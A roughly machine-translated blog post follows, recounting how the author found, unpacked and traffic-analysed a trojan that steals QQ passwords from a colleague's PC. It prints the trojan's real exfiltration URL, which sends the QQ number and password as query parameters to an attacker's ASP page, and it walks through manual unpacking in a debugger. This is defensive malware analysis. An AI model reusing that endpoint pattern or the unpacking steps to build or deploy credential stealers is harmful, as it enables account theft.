The process of tracking stolen QQ Trojan

This morning, some colleagues said that their QQ was stolen, last night is still in use, the password is wrong this morning. Her QQ is only used on her own computer, the problem should be on that computer.

To her machine, using Autoruns to find two suspicious EXE, A syssmss.exe, a test.exe, but both look size and icons are the same, should be the same file, with the Peid shell, nothing, oh, nothing is something, and placed in the "C:/Program Files/internet explorer/"directory, it is more problematic performance. , using PEQ and IceSword to find two suspicious DLLs, temporarily not sure.

       sampling took back to my machine, with WINUPX first the two DLLs shelled, with win32dasm view string, found that the string display is more "normal", There is no special Trojan feature--maybe something like 3721 rogue software come, now this idea, rogue too much. Re-analysis syssmss.exe,peid0.94 is still reporting nothing, with the latest rising and Norton did not find the virus, but found Peid show the EP Section is. NSP1, it should be a feature of a shell software, and then surf the Internet to find. NSP1, the results only in the snow to find an article with the word, browse it again, is roughly a piece of software shelling processing. Of course, the most I want to see is the inside of the string, that can only be shelled, good is also relatively simple, and look at the string is not necessarily required after shelling the program can be run. After OD loading, stop in the Pushad and PUSHFD two statements, press the post on the forum example, I directly find POPFD, find the class "popfd       popad       jmp xxxxxx "code, that JMP is Oep, set a breakpoint, arrive xxxx, dump a file, and then use Peid to find out is Delphi, Haha, although can not successfully run after shelling of the program , but at least you can see the character reference, with Win32dasm Open, string reference, found a lot of Trojan common string, Qq.exe, Wow.exe, mir3.exe,findprocess and the like, this is not on the forehead written "I am a trojan" it. But also too ruthless, from QQ to online games, what number to want. (Reminds me of ... "IP, IC, IQ card, tell me the password")

Here's where to find the data, run Win2000 with VMware (try it with your own machine). You when I was stupid. ), (preferably a snapshot before running), install QQ, run Iris on the VMware host, set the filter target IP is the machine in VMware, in order to insure, I run a winsocket expert in VMware, Then run Syssmss.exe, in the Wsock to specify the monitoring Syssmss.exe, then you can see a running syssmss.exe immediately there are several reports, is pointing to a website, ready to download the virus file (or upgrade files), but it seems to be not connected, and then calmed down.
Run QQ.exe, random input number 233223, password 33213313, good fast iris and Wsock have the data packet records, the address combination, is similar to "http://www.yhppy.meibu.com/q21/sg.asp?" urlna=233223&urlpa=33213313 ", the original is the QQ number and password sent to the ASP file on the website. Because it is not sent by email or FTP data, there is no way to further.

Then put Syssmss.exe stop, delete, restart after running QQ.exe, casually lose the number, no capture data, may be no further infection action. Call it a day, and leave a piece of paper to make a memo.